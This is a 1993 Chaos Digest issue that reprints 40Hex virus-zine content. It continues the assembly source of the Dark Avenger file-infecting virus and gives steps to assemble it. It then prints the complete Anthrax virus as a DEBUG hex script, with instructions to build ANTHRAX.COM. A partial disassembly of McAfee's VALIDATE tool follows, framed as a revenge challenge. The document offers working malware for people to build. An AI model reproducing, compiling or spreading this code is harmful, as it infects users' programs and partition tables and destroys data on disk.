
Chaos Digest Volume 01 Numero 37


  

Chaos Digest Mercredi 26 Mai 1993 Volume 1 : Numero 37
ISSN 1244-4901

Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
Archiviste: Yves-Marie Crabbe
Co-Redacteurs: Arnaud Bigare, Stephane Briere

TABLE DES MATIERES, #1.37 (26 Mai 1993)
File 1--40H VMag Issue 1 Volume 3 #002(2)-004(1) (reprint)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
linux-activists-request@niksula.hut.fi
with a mail header or first line containing the following information:
X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
groups.

Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
466893. Back issues of ChaosD can be found on the Internet as part of the
Computer underground Digest archives. They're accessible using anonymous FTP:

* kragar.eff.org [192.88.144.4] in /pub/cud/chaos
* uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
* halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
* ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
* ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
* nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
* orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses. Please
avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent
the views of the moderators. Chaos Digest contributors
assume all responsibility for ensuring that articles
submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Issue 1 Volume 3 #002(2)-004(1) (reprint)

[suite du listing de _Dark Avenger_ de ChaosD #1.35:]

; Check if the file is properly infected

see_sick:
sub dx,startup-copyright
sbb cx,0
mov ax,4200h
int 21h
add ax,offset top_file
adc dx,0
cmp ax,word ptr [top_save+18h]
jne see_fuck
cmp dx,word ptr [top_save+1ah]
jne see_fuck
mov dx,offset top_save+1ch
mov si,dx
mov cx,offset my_size
mov ah,3fh
int 21h
jc see_fuck
cmp cx,ax
jne see_fuck
xor di,di
next_byte:

lodsb
scasb
jne see_fuck
loop next_byte
stop_fuck_2:
ret
see_fuck:
xor cx,cx ;Seek to the end of file
xor dx,dx
mov ax,4202h
int 21h
cmp word ptr [top_save],5a4dh
je fuck_exe
add ax,offset aux_size+200h ;Watch out for too big .COM files
adc dx,0
je fuck_it
ret

;Pad .EXE files to paragraph boundary. This is absolutely unnecessary.

fuck_exe:
mov dx,word ptr [top_save+18h]
neg dl
and dx,0fh
xor cx,cx
mov ax,4201h
int 21h
mov word ptr [top_save+18h],ax
mov word ptr [top_save+1ah],dx
fuck_it:
mov ax,5700h ;Get file's date
int 21h
pushf
push cx
push dx
cmp word ptr [top_save],5a4dh
je exe_file ;Very clever, isn't it?
mov ax,100h
jmp short set_adr
exe_file:
mov ax,word ptr [top_save+14h]
mov dx,word ptr [top_save+16h]
set_adr:
mov di,offset call_adr
stosw
mov ax,dx
stosw
mov ax,word ptr [top_save+10h]
stosw
mov ax,word ptr [top_save+0eh]
stosw
mov si,offset top_save ;This offers the possibilities to
movsb ;some nasty programs to restore
movsw ;exactly the original length
xor dx,dx ;of the .EXE files
mov cx,offset top_file
mov ah,40h
int 21h ;Write the virus
jc go_no_fuck ;(don't trace here)
xor cx,ax
jnz go_no_fuck
mov dx,cx
mov ax,4200h
int 21h
cmp word ptr [top_save],5a4dh
je do_exe
mov byte ptr [top_save],0e9h
mov ax,word ptr [top_save+18h]
add ax,startup-copyright-3
mov word ptr [top_save+1],ax
mov cx,3
jmp short write_header
go_no_fuck:
jmp short no_fuck

;Construct the .EXE file's header

do_exe:
call mul_hdr
not ax
not dx
inc ax
jne calc_offs
inc dx
calc_offs:
add ax,word ptr [top_save+18h]
adc dx,word ptr [top_save+1ah]
mov cx,10h
div cx
mov word ptr [top_save+14h],startup-copyright
mov word ptr [top_save+16h],ax
add ax,(offset top_file-offset copyright-1)/16+1
mov word ptr [top_save+0eh],ax
mov word ptr [top_save+10h],100h
add word ptr [top_save+18h],offset top_file
adc word ptr [top_save+1ah],0
mov ax,word ptr [top_save+18h]
and ax,1ffh
mov word ptr [top_save+2],ax
pushf
mov ax,word ptr [top_save+19h]
shr byte ptr [top_save+1bh],1
rcr ax,1
popf
jz update_len
inc ax
update_len:
mov word ptr [top_save+4],ax
mov cx,18h
write_header:
mov dx,offset top_save
mov ah,40h
int 21h ;Write the file beginning
no_fuck:
pop dx
pop cx
popf
jc stop_fuck
mov ax,5701h ;Restore the original file date
int 21h
stop_fuck:
ret

;The following is used by the INT 21h and INT 27h handlers in connection
;to the program hiding in memory from those who don't need to see it.
;The whole system is absurd and meaningless and it is also another source
;for program conflicts.
;
;alloc: calls get_chain, which leaves a memory control block (MCB) segment
;in DS, and writes 'M' to byte 0 of that block. 'M' is the DOS MCB type
;byte for a block that is NOT the last one in the chain. The caller's DS
;is restored. There is no RET here: execution falls through into ontop.

alloc:
push ds
call get_chain
mov byte ptr ds:[0],'M' ;Rewrite the MCB type byte to "not last"
pop ds

;Assures that the program is the first one in the processes,
;which have intercepted INT 21h (yet another source of conflicts).
;
;ontop: reads the live INT 21h vector from the interrupt vector table
;(0000:0084h). If it already points at CS:int_21 nothing is changed.
;Otherwise the segment of whoever currently owns the vector is scanned
;for a stored copy of CS:int_21, the chain is re-linked (see got_him),
;and the vector table entry is forced back to CS:int_21.
;Preserves DS, AX, BX, DX.
;Analysis note: the observable effect is that any INT 21h hook installed
;after this code is pushed behind it, or dropped from the chain entirely
;when the scan finds nothing (see return_control).

ontop:
push ds
push ax
push bx
push dx
xor bx,bx
mov ds,bx ;DS = 0: interrupt vector table
lds dx,ds:[21h*4] ;DS:DX = current INT 21h handler
cmp dx,offset int_21
jne search_segment ;Offset differs: someone else owns the vector (BX is 0 here)
mov ax,ds
mov bx,cs
cmp ax,bx
je test_complete ;Vector is already CS:int_21, nothing to do

;Searches the segment of the sucker who has intercepted INT 21h, in
;order to find where it has stored the old values and to replace them.
;Nothing is done for INT 27h.

xor bx,bx ;BX held CS from the compare above; restart the scan at offset 0
search_segment:
;Byte-by-byte scan of the current handler's segment (DS) for the dword
;offset int_21 : CS, i.e. the place where that handler saved "our" address.
mov ax,[bx]
cmp ax,offset int_21
jne search_next
mov ax,cs
cmp ax,[bx+2]
je got_him
search_next:
inc bx
jne search_segment ;Continue until BX wraps around to 0
je return_control ;Whole segment scanned, no match (BX = 0)
got_him:
;Swap chain positions: the other handler's saved vector now gets the
;value held in save_int_21, and save_int_21 takes the other handler's
;address (DS:DX).
mov ax,word ptr cs:[save_int_21]
mov [bx],ax
mov ax,word ptr cs:[save_int_21+2]
mov [bx+2],ax
mov word ptr cs:[save_int_21],dx
mov word ptr cs:[save_int_21+2],ds
xor bx,bx

;Even if he has not saved them in the same segment, this won't help him.

return_control:
;Reached with BX = 0 on both paths. On the no-match path save_int_21 is
;left unchanged, so the other handler is no longer reachable through
;this code's chain once the vector below is overwritten.
mov ds,bx
mov ds:[21h*4],offset int_21
mov ds:[21h*4+2],cs
test_complete:
pop dx
pop bx
pop ax
pop ds
ret

;Fetch the segment of the last MCB
;
;Walks the DOS memory control block chain and returns, in DS, the segment
;of the last MCB whose successor lies at or beyond CS-1.
;In:  nothing
;Out: DS = MCB segment found by the walk
;Preserves AX and BX.
;NOTE(review): "function" is defined outside this excerpt; presumably it
;issues the DOS call selected by AH. AH=62h is "get PSP segment" and
;returns it in BX - confirm against the earlier part of the listing.

get_chain:
push ax
push bx
mov ah,62h
call function
mov ax,cs
dec ax ;AX = CS-1, the paragraph just below this code's segment
dec bx ;BX = segment returned in BX minus 1 (presumably PSP-1, that process's MCB)
next_blk:
mov ds,bx
stc
adc bx,ds:[3] ;BX = BX + block size (MCB offset 3, paragraphs) + 1 = next MCB
cmp bx,ax
jc next_blk ;Unsigned: keep walking while the next MCB is below CS-1
pop bx
pop ax
ret

;Multiply by 16
;
;mul_hdr: loads the word at top_save+8 and converts it from paragraphs to
;bytes. top_save holds the first 24 bytes read from the file, and offset 8
;of an .EXE (MZ) header is the header size in paragraphs.
;mul_16: second entry point, multiplies whatever the caller put in AX.
;Out: DX:AX = AX * 16 (32-bit result). Flags are changed by MUL.

mul_hdr:
mov ax,word ptr [top_save+8]
mul_16:
mov dx,10h
mul dx
ret

;Plain-text, NUL-terminated author string. It sits before the top_file
;label, which the listing marks as the end of the code written into files,
;so it appears unencrypted in the written body and can serve as a
;signature string for this family.
db 'This program was written in the city of Sofia '
db '(C) 1988-89 Dark Avenger',0

;INT 13h handler.
;Calls the original vectors in BIOS, if it's a writing call
;
;Dispatch:
;  AH <> 3                -> far jump through save_int_13 (previous handler)
;  AH = 3 and DL <  80h   -> far jump through the dword at "disk"
;  AH = 3 and DL >= 80h   -> far jump through the dword at "fdisk"
;AH=3 is the BIOS "write sectors" function and DL >= 80h selects a hard
;disk. Each "db 0eah" is the opcode of a far JMP and the "dd 0" after it
;is that jump's operand; the operands are zero in the listing, so they
;are presumably patched at run time by code outside this excerpt.
;Analysis note: sending write calls straight to the addresses the header
;comment calls the original BIOS vectors means handlers hooked on
;INT 13h in between would not see those writes.

int_13:
cmp ah,3
jnz subfn_ok
cmp dl,80h
jnc hdisk ;Unsigned >= 80h: hard disk
db 0eah ;JMP XXXX:YYYY
;my_size marks the end of the region used by the self-comparison in
;see_sick (mov cx,offset my_size); the dwords that follow are not
;compared, presumably because they differ from copy to copy.
my_size: ;--- Up to here comparison
disk: ; with the original is made
dd 0
hdisk:
db 0eah ;JMP XXXX:YYYY
fdisk:
dd 0
subfn_ok:
db 0eah ;JMP XXXX:YYYY
save_int_13:
dd 0
;Data area and work-buffer layout.
;call_adr, stack_pointer and my_save are the last items before top_file,
;so they are part of the body written into files. The set_adr code
;earlier in the listing fills them with four words (entry offset, DX,
;header word 10h, header word 0Eh) followed by the first 3 bytes of
;top_save. These saved values are what a repair tool needs in order to
;restore a file's original entry point and first bytes.
;Everything from top_file onward is defined with EQU only: it names a
;scratch area placed after the written body and occupies no bytes in the
;assembled image.
call_adr:
dd 100h ;Default 0:100h; 100h is what set_adr stores for non-.EXE files

stack_pointer:
dd 0 ;The original value of SS:SP
my_save:
int 20h ;The original contents of the first
nop ;3 bytes of the file
top_file: ;--- Up to here the code is written
filehndl equ $ ; in the files
filename equ filehndl+2 ;Buffer for the name of the opened
file
save_int_27 equ filename+65 ;Original INT 27h vector
save_int_21 equ save_int_27+4 ;Original INT 21h vector
aux_size equ save_int_21+4 ;--- Up to here is moved into memory
top_save equ save_int_21+4 ;Beginning of the buffer, which
;contains
; - The first 24 bytes read from file
; - File length (4 bytes)
; - The last bytes of the file
; (my_size bytes)
;top_bz and my_bz are the distances of top_save and my_size from the
;copyright label, which is defined earlier in the listing.
top_bz equ top_save-copyright
my_bz equ my_size-copyright
code ends
end

------------------------------------------------------------------------------

A few notes on assembling this virus.

It's a little bit tricky assembling the Dark Avenger Virus. Use
these steps below. I use Turbo Assembler 2.0, but I'm positve that
MASM will work just as well.

1:
TASM AVENGER.ASM

2:
TLINK AVENGER.OBJ

3:
EXE2BIN AVENGER AVENGER.COM

Now make a 3 byte file named JUMP.TMP using DEBUG like this

4: DEBUG

n jmp.tmp
e 0100 E9 68 00

rcx
3
w
q

5: Now do this COPY JMP.TMP + AVENGER.COM DAVENGER.COM

There you have it....
HR
+++++

40Hex Issue 3 0003

Anthrax

Well, this is turning out to be a tribute issue to the Dark
Avenger. Here is another one of his better known viruses. This is
a nice one cause it not only is a file infector, but it is also a
sort of boot sector virus. It is also what I dubbed a reincarnation
virus, meaning that even if you clean your system of it, it may
still live, because it leaves a copy of itself on the last sector of
the disk. The virus can be reincarnated by the V2100 virus, also by
The Dark Avenger.

Well, Patti Hoffman (one of my favorite people on earth, not) wrote
this virus up.

Aliases:
V Status: Rare [Not for long]
Discovery: July, 1990
Symptoms: .COM & .EXE growth
Origin: Bulgaria
Isolated: Netherlands
Eff Length: 1040 - 1279 Bytes
Type Code: PRAKX-Parasitic Resident .COM, .EXE, & Partition Table Infector
Detection Method: ViruScan V66+, Pro-Scan 2.01+, IBM Scan 2.00+
Removal Instructions: Scan/D + MDisk/P, Pro-Scan 2.01+
General Comments:

The Anthrax Virus was isolated in July 1990 in the Netherlands after
it was uploaded onto several BBSes in a trojan anti-viral program,
USCAN.ZIP. It is the second virus to be found in a copy of UScan
during July 1990, the first virus being V2100. Anthrax is a memory
resident generic infector of .COM and .EXE files, including
COMMAND.COM.

The first time a program infected with the Anthrax virus is executed
on the system's hard disk, the virus will infect the hard disk's
partition table. At this point, the virus is not memory resident. It
will also write a copy of itself on the last few sectors of the
system's hard disk. If data existed on those last few sectors of the
hard disk, it will be destroyed.

When the system is booted from the hard disk, the Anthrax virus
will install itself memory resident. It will remain memory resident
until the first program is executed. At that time, it will deinstall
itself from being resident and infect one .COM or .EXE file. This
virus does not infect files in the current directory first, but
instead starts to infect files at the lowest level of the disk's
directory tree.

Later, when an infected program is executed, Anthrax will infect one
.COM or .EXE file, searching the directory structure from the lowest
level of the directory tree. If the executed infected program
was located on the floppy drive, a .COM or .EXE file may or may not
be infected.

The Anthrax Virus's code is 1,024 bytes long, but infected programs
will increase in length by 1,040 to 1,279 bytes. On the author's test
system, the largest increase in length experienced was 1,232 bytes.
Infected files will always have an infected file length that is a
multiple of 16.

The following text strings can be found in files infected with the
Anthrax virus:

"(c)Damage, Inc."
"ANTHRAX"

A third text string occurs in the viral code, but it is in Cyrillics.
Per Vesselin Bontchev, this third string translates to: "Sofia 1990".

Since Anthrax infects the hard disk partition tables, infected systems
must have the partition table disinfected or rebuilt in order to
remove the virus. This disinfection can be done with either a low-
level format or use of the MDisk/P program for the correct DOS
version after powering off and rebooting from a write-protected boot
diskette for the system. Any .COM or .EXE files infected with
Anthrax must also be disinfected or erased. Since a copy of the virus
will exist on the last few sectors of the drive, these must also be
located and overwritten.

Anthrax interacts with another virus: V2100. If a system which was
previously infected with Anthrax should become infected with the V2100
virus, the V2100 virus will check the last few sectors of the hard
disk for the spare copy of Anthrax. If the spare copy is found, then
Anthrax will be copied to the hard disk's partition table.

It is not known if Anthrax carries any destructive capabilities or
trigger/activation dates.

Here is the actual virus. Well if this is your fist copy of
40Hex, let me explain how to compile it.

First copy what is below with your editor. Then save it to a file
called ANTHRAX.SCR. Then type at the command line -

DEBUG <ANTHRAX.SCR

This will create a file called ANTHRAX.COM, that's the actual virus.

----------------------------------------------------------------------------

n anthrax.com
e 0100 E9 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0110 95 8C C8 2D 00 00 BA 00 00 50 52 1E 33 C9 8E D9
e 0120 BE 4C 00 B8 CD 00 8C CA 87 44 44 87 54 46 52 50
e 0130 C4 1C B4 13 CD 2F 06 53 B4 13 CD 2F 58 5A 87 04
e 0140 87 54 02 52 50 51 56 A0 3F 04 A8 0F 75 6C 0E 07
e 0150 BA 80 00 B1 03 BB 77 06 B8 01 02 50 CD 13 58 B1
e 0160 01 BB 00 04 CD 13 0E 1F BE 9B 03 8B FB B9 5E 00
e 0170 56 F3 A6 5E 8B FB B9 62 00 56 F3 A4 5F BE 12 08
e 0180 B9 65 00 F3 A4 74 1E 89 4D E9 B1 5C 89 4D 9B 88
e 0190 6D DC B1 02 33 DB B8 02 03 CD 13 49 BB 00 04 B8
e 01A0 01 03 CD 13 49 B4 19 CD 21 50 B2 02 B4 0E CD 21
e 01B0 B7 02 E8 87 01 5A B4 0E CD 21 5E 1F 8F 04 8F 44
e 01C0 02 8F 44 44 8F 44 46 1F 1E 07 95 CB 28 63 29 20
e 01D0 44 61 6D 61 67 65 2C 20 49 6E 63 2E 00 B0 03 CF
e 01E0 06 1E 57 56 50 33 C0 8E D8 BE 86 00 0E 07 BF 08
e 01F0 06 FD AD AB A5 AF 87 F7 AD FC 74 11 1E 07 AF B8
e 0200 07 01 AB 8C C8 AB 8E D8 BF 68 00 A5 A5 58 5E 5F
e 0210 1F 07 2E FF 2E 00 06 06 1E 57 56 52 51 53 50 0E
e 0220 1F BE 06 06 33 C9 8E C1 BF 84 00 A5 A5 B4 52 CD
e 0230 21 26 8B 47 FE 8E D8 BB 03 00 03 07 40 8E D8 81
e 0240 07 80 00 0E 07 B7 12 E8 F2 00 58 5B 59 5A 5E 5F
e 0250 1F 07 2E FF 2E 06 06 C3 91 AE B4 A8 BF 20 31 39
e 0260 39 30 B8 00 3D CD 21 72 EE 93 B8 20 12 CD 2F 53
e 0270 26 8A 1D B8 16 12 CD 2F 5B BE 62 04 8B D6 B1 18
e 0280 B4 3F CD 21 33 C1 75 70 06 1F C6 45 02 02 33 D2
e 0290 EC 3C 10 72 FB 03 45 11 13 55 13 24 F0 3D 00 FB
e 02A0 73 56 89 45 15 89 55 17 0E 1F 50 B1 10 F7 F1 2B
e 02B0 44 08 8B C8 2B 44 16 A3 04 00 AD 35 4D 5A 74 03
e 02C0 35 17 17 9C 75 17 89 04 3B 44 0A 87 44 12 A3 07
e 02D0 00 89 4C 14 B9 DC 04 74 07 83 44 08 48 B9 65 00
e 02E0 51 B9 9B 03 B4 40 CD 21 33 C8 59 75 09 BA 00 04
e 02F0 B4 40 CD 21 33 C8 5A 58 75 38 26 89 4D 15 26 89
e 0300 4D 17 52 9D 75 18 26 8B 45 11 26 8B 55 13 B5 02
e 0310 F7 F1 85 D2 74 01 40 89 14 89 44 02 EB 0A C6 44
e 0320 FE E9 05 28 03 89 44 FF B9 18 00 8D 54 FE B4 40
e 0330 CD 21 26 80 4D 06 40 B4 3E CD 21 C3 8E D9 8A 1E
e 0340 6C 04 0E 1F FF 06 5E 04 BA 4B 06 E8 1F 00 BE 0A
e 0350 06 C6 04 5C 46 32 D2 B4 47 CD 21 BA 9B 03 B4 3B
e 0360 CD 21 E3 0D B4 51 CD 21 8E DB BA 80 00 B4 1A EB
e 0370 C8 72 3E BE 9C 03 32 D2 B4 47 CD 21 3A 2E DC 03
e 0380 B1 32 BA 9D 02 B4 4E 74 5C CD 21 72 24 BA 4B 06
e 0390 B8 01 4F BE DC 03 BF 68 06 AA B1 0D F3 A6 74 45
e 03A0 3A 6D FE 74 40 CD 21 73 E4 32 C0 EB D3 2A 2E 2A
e 03B0 00 B1 41 BF 9C 03 3A 2D 8A C5 A2 DC 03 74 69 F2
e 03C0 AE 4F B1 41 B0 5C FD F2 AE 8D 75 02 BF DC 03 FC
e 03D0 AC 84 C0 AA 75 FA BA CD 02 32 C9 EB 81 2E 2E 00
e 03E0 BA 4B 06 B4 4F CD 21 72 C8 BE 69 06 BF DC 03 80
e 03F0 3C 2E 74 EC 88 2D 8B D6 F6 44 F7 10 75 DB AC 84
e 0400 C0 AA 75 FA 4E FD AD AD FC 3D 58 45 74 05 3D 4F
e 0410 4D 75 CD 53 E8 4B FE 5B 33 C9 8E C1 26 A0 6C 04
e 0420 0E 07 2A C3 3A C7 72 B8 BA 80 00 B1 03 BB 00 02
e 0430 B8 01 03 CD 13 BA 0A 06 E9 23 FF 95 BF 00 01 8B
e 0440 5D 01 81 EB 28 02 8B C7 8D B7 FD 03 A5 A4 93 B1
e 0450 04 D3 E8 8C D9 03 C1 BA 0B 00 EB 71 B8 D0 00 FC
e 0460 87 85 68 FA AB 8C C8 E2 F7 A3 86 00 AB 8E D8 B4
e 0470 08 CD 13 49 49 A1 E9 03 84 E4 74 01 91 B2 80 B8
e 0480 03 03 CD 13 91 84 E4 75 02 2C 40 FE CC A3 E9 03
e 0490 FF 06 60 04 32 F6 B9 01 00 BB 00 04 B8 01 03 CD
e 04A0 13 8A D6 CB 41 4E 54 48 52 41 58 0E 1F 83 2E 13
e 04B0 04 02 CD 12 B1 06 D3 E0 8E C0 BF 00 04 BE 00 7C
e 04C0 B9 00 01 8B DE FC F3 A5 8E D8 BA 27 04 51 53 50
e 04D0 52 CB 8E C1 B1 04 BE B0 05 83 C6 0E AD 3C 80 74
e 04E0 04 E2 F6 CD 18 92 FD AD 91 B8 01 02 CD 13 81 3E
e 04F0 FE 05 55 AA 75 ED 06 1E 07 1F 32 F6 B9 02 00 33
e 0500 DB B8 02 02 CD 13 E9 EE FE 00 00 00 00 CD 20 CC
e 0510 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
e 0520 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
e 0530 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
e 0540 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
e 0550 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
e 0560 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
e 0570 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A

rcx
480
w
q

------------------------------------------------------------------------
HR
+++++

40Hex Issue 3 0004

The Strange Case of Validate

- Fall to your knees, begging your way out of this disease.

Well we all know what a dick John Mcafee is. Well with his product
SCAN comes a program VALIDATE. I noticed when I took a close look
at the internal workings of this program (while working on a little
revenge project) that there is text in the program. The strings
read

"Enter password now"
"Access denied"

Well this got me going, what is this??? Well this brings up our
first 40Hex challenge. I am including a disassembly of validate.
Here it is:

----------------------------------------------------------------------------

; Disassembler-generated names for absolute offsets. None of these eleven
; equates is referenced in the part of the listing visible here.
data_1e equ 100h
data_2e equ 102h
data_3e equ 2Ch
data_4e equ 14h
data_5e equ 16h
data_6e equ 18h
data_7e equ 1Ah
data_8e equ 47h
data_9e equ 49h
data_10e equ 4Ah
data_11e equ 59h

; Single segment for both code and data, with the code origin at 100h
; (the layout of a DOS .COM program).
seg_a segment byte public
assume cs:seg_a, ds:seg_a


org 100h

; Program entry. The first instruction jumps over the banner text and
; tables to loc_96, a label that is not defined in the visible part of
; the listing. The rest of this "proc" is data plus the shared error exit.
validate proc far

start:
jmp loc_96
; Banner text. It ends with 1Ah (Ctrl-Z), which makes TYPE stop here when
; the .COM file is typed to the screen.
db 0Dh, ' ', 0Dh, 0Ah, 'VALIDATE 0'
db '.3 '
copyright db 'Copyright 1988-89 by McAfee Asso'
db 'ciates.'
db ' (408) 988-3832', 0Dh, 0Ah, 0Dh
db 0Ah, 'Written by Dennis Yelle', 0Dh
db 0Ah, 0Dh, 0Ah
db 1Ah

; 30h followed by '123456789ABCDEF' forms the table "0123456789ABCDEF",
; i.e. a hex-digit lookup table.
; NOTE(review): the byte lists after it, each ending in 0C8h, look like
; parameter tables for the two check methods - cannot be confirmed from
; the visible code.
data_19 db 30h dexed access)
db '123456789ABCDEF'
db 10h, 0Fh, 0Dh, 8, 6, 3
db 1, 0, 0C8h, 10h, 0Ch, 5
db 0, 0C8h, 10h, 0Fh, 2, 0
db 0C8h, 10h, 0Fh, 0Eh, 7, 6
db 0, 0C8h, 10h, 0Fh, 0Dh, 0
db 0C8h
; Error exit: terminate with return code 1 (INT 21h, AH=4Ch). sub_1 jumps
; here after printing a message whose terminator byte is 1.
loc_1:
mov al,1
mov ah,4Ch
int 21h
db 0CDh, 20h ; Raw bytes of INT 20h: fallback terminate if AH=4Ch returns
loc_2:
jmp short loc_2 ; Spin forever if both terminate calls return

validate endp

; Print a terminated string to standard output.
; In:  DS:SI = string, terminated by a byte of value 0 or 1
; Out: SI = address of the byte after the terminator
;      Terminator 0: returns to the caller.
;      Terminator 1: jumps to loc_1, which exits with return code 1.
; Changes AX, BX, CX, DX.
sub_1 proc near
mov dx,si ; DX = start of string (buffer address for the write)
loc_3:
lodsb
cmp al,1
ja loc_3 ; Unsigned: keep scanning while the byte is above 1
pushf ; Keep the compare result (ZF set when terminator = 1) across the arithmetic below
mov cx,si
sub cx,dx
dec cx ; CX = length without the terminator
mov ah,40h ; DOS write to handle
mov bx,1 ; Handle 1 = standard output
int 21h
popf
jz loc_1 ; Terminator was 1: message is fatal, exit
retn
sub_1 endp

; Print the string that is stored inline immediately after the CALL.
; The return address on the stack points at the string; it is swapped into
; SI, printed by sub_1, and the advanced SI (first byte after the
; terminator) is swapped back as the new return address. The caller's SI
; is preserved; BP is overwritten.
; Reading aid: because text follows each "call sub_2", the disassembler
; decodes that text as instructions. Runs of "and [bx+si],ah" after a call
; to sub_2 are the bytes 20h 20h, i.e. pairs of spaces.
sub_2 proc near
mov bp,sp
xchg si,[bp] ; SI = address of inline string, caller's SI parked on the stack
call sub_1
xchg si,[bp] ; Return address = byte after the string, SI restored
retn
sub_2 endp

; Main program body. Parts of it were emitted as raw bytes by the
; disassembler. NOTE(review): the decodings given in the comments below
; were done by hand - confirm them with a disassembler.
;
; The first run of bytes appears to decode as:
;   mov ah,40h / mov bx,2 / mov cx,48h / mov dx,109h / int 21h
;       (write 48h bytes from offset 109h to handle 2, presumably the banner)
;   mov ax,[2] / mov bx,cs / sub ax,bx / cmp ax,1000h / ja +52h
;       (word at offset 2 minus CS, compared with 1000h paragraphs)
;   call sub_2, followed by its inline "not enough memory" text
db 0B4h, 40h, 0BBh, 2, 0, 0B9h
db 48h, 0, 0BAh, 9, 1, 0CDh
db 21h, 0A1h, 2, 0, 8Ch, 0CBh
db 29h, 0D8h, 3Dh, 0, 10h, 77h
db 52h, 0E8h, 0D8h, 0FFh
db 0Dh, 0Ah, ' Sorry, there is not e'
db 'nough memory available.', 0Dh, 0Ah
db ' I need 66000 bytes of RAM.', 0Dh
db 0Ah
; The leading 1 is the string terminator (sub_1 exits with code 1 on it).
; The remaining bytes appear to decode as:
;   mov si,80h / lodsb / or al,al / jz +9
; i.e. read the byte at offset 80h and branch when it is zero. In a .COM
; program offset 80h of the PSP is the command-tail length.
db 1, 0BEh, 80h, 0, 0ACh, 0Ah
db 0C0h
db 74h, 9
loc_4:
; Skip blanks; a carriage return here means no file name was given.
lodsb
cmp al,20h
je loc_4
cmp al,0Dh
jne loc_6
loc_5:
jmp loc_10
loc_6:
; Start of one file-name argument.
dec si
mov data_33,si ; data_33 = address of the first character of the name
push si
; NOTE(review): sub_9 and sub_10 are outside the visible listing. They are
; called once with DI=666h and once with DI=866h, the same two addresses
; sub_3 later passes to sub_11 - presumably one work area per check method.
mov si,197h
call sub_9
mov di,666h
call sub_10
mov si,186h
call sub_9
mov di,866h
call sub_10
call sub_2
; Inline text for sub_2, decoded as instructions: ten spaces (20h), then
; 46h ('F') shown as "inc si", then 'ile Name: ' and the 0 terminator.
; The trailing 5Eh is "pop si", matching the push above.
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
inc si
db 'ile Name: '
db 0, 5Eh
loc_7:
; Find the end of the name. JG is a signed compare, so the scan stops on
; any byte <= 20h and also on any byte >= 80h.
lodsb
cmp al,20h
jg loc_7
push ax ; Remember which character ended the name
xor al,al
mov [si-1],al ; NUL-terminate the name in place
mov bx,1
mov cx,si
dec cx
mov dx,data_33
sub cx,dx ; CX = length of the name
mov ah,40h
int 21h ; Echo the name to standard output
push si
call sub_8
mov dx,data_33
mov ax,3D00h ; DOS open, access mode 0 = read-only
int 21h
jc loc_11 ; Open failed
mov data_32,ax ; data_32 = file handle
;* call sub_3
db 0E8h, 0B8h, 0
mov ah,3Eh ; DOS close handle
mov bx,data_32
int 21h
pop si
pop ax
cmp al,0Dh
je loc_9 ; Name ended at the carriage return: no more arguments
loc_8:
lodsb
cmp al,20h
je loc_8
cmp al,0Dh
je loc_9
call sub_8
jmp loc_6 ; Process the next file name
loc_9:
mov ax,4C00h ; Normal exit, return code 0
int 21h
loc_10:
; DX = offset and CX = length (84h bytes) of a message handed to loc_17,
; which is not in the visible listing; presumably the usage text below.
mov dx,2E6h
mov cx,84h
jmp loc_17
loc_11:
; Same pattern for the open-failure case: 29h bytes at offset 5FBh.
mov dx,5FBh
mov cx,29h
jmp loc_17
db 'This program prints the validati'
db 'on information for a file.', 0Dh
db 0Ah, 'Examples:', 0Dh, 0Ah, ' '
db ' VALIDATE SCAN.EXE', 0Dh, 0Ah
db ' VALIDATE SCANRES.EXE', 0Dh
db 0Ah
sub_3 proc near
xor ax,ax
mov data_34,ax
mov data_35,ax
loc_12:
mov bx,data_32
mov dx,0A66h
mov cx,8000h
mov ah,3Fh
int 21h
jnc loc_13
jmp loc_16
loc_13:
or ax,ax
jz loc_14
mov dx,ax
push dx
mov si,0A66h
mov di,666h
mov cx,data_34
call sub_11
mov data_34,cx
pop dx
mov si,0A66h
mov di,866h
mov cx,data_35
call sub_11
mov data_35,cx
jmp short loc_12
loc_14:
call sub_2
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bp+di+69h],dl
jp $+67h
cmp ah,[bx+si]
and [bx+si],al
mov ax,4202h
mov bx,data_32
xor cx,cx
xor dx,dx
int 21h
jnc $+0Fh
call sub_2
jnz $+70h
db 6Bh, 6Eh, 6Fh, 77h, 6Eh, 0
db 0EBh, 3, 0E8h, 59h, 1, 0E8h
db 0D1h, 0FDh
db 0Dh, 0Ah, ' Date: '
